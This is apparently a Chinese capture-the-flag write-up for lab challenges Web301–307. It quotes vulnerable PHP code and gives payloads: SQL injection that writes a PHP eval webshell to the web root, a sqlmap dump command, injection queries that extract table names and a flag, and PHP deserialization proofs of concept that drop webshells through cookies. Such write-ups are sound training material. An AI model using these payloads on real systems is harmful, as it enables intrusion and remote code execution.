Web301

问题代码

checklogin.php  无过滤
$sql="select sds_password from sds_user where sds_username='".$username."' order 
by id limit 1;";

payload

用户名传入
xx' union select "<?php eval($_POST[cmd]);?>" into outfile "/var/www/html/a.php"#

sqlmap方法
sqlmap -u "url" --dump --form --batch
参数说明:--dump脱裤  --form表单测试 --batch默认参数

Web302

问题代码

checklogin.php 对执行的结果进行检查,但是对执行前无过滤

payload

用户名传入
xx' union select "<?=eval($_POST[cmd])?>" into outfile "/var/www/html/a.php"#

Web303-304

问题代码

使用admin/admin登陆之后,访问dptadd.php传参
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";

payload,依次传值

//查询表名
dpt_name=1',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

//从表查询字段名
dpt_name=1',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_flaag')#

//从字段名拿到数据
dpt_name=1',sds_address=(select flag from sds_flaag)#

Web305

问题代码

checklogin.php

if(isset($user_cookie)){
    $user = unserialize($user_cookie);
}

class.php

class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __destruct(){
        file_put_contents($this->username, $this->password);
    }
}

payload
本地php调试,复制class.php代码,然后echo序列化的值

<?php
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
}
echo serialize(new user('a.php','<?php eval($_POST[cmd]);?>'));

然后将输出的值给urlencode,传入cookie,名称:user,值:上面输出的值,path:/checklogin.php

Web306

审计代码

class.php

class log{
    public $title='log.txt';
    public $info='';//反序列化时可以自定义变量

    public function close(){
        file_put_contents($this->title, $this->info);
    }//这里可以写入文件
}

**dao.php**
class dao{
public function __destruct(){
        $this->conn->close();
    }
}//调用了close方法

**index.php**
$user = unserialize(base64_decode($_COOKIE['user']));
//序列化入口

POC

<?php
class dao{
private $conn;
public function __construct(){
        $this->conn=new log();
    }
}

class log{
    public $title='a.php';
    public $info='<?php eval($_POST[cmd]);?>';
}

$a=new dao();
echo base64_encode(serialize($a));

将输出的内容,放到cookie,名称user,值上面输出的,path:/index.php,访问Index.php即可执行

Web307

WP

https://blog.csdn.net/weixin_45669205/article/details/115462061
https://blog.csdn.net/miuzzx/article/details/111352849
最后修改:2022 年 07 月 17 日
如果觉得我的文章对你有用,请随意赞赏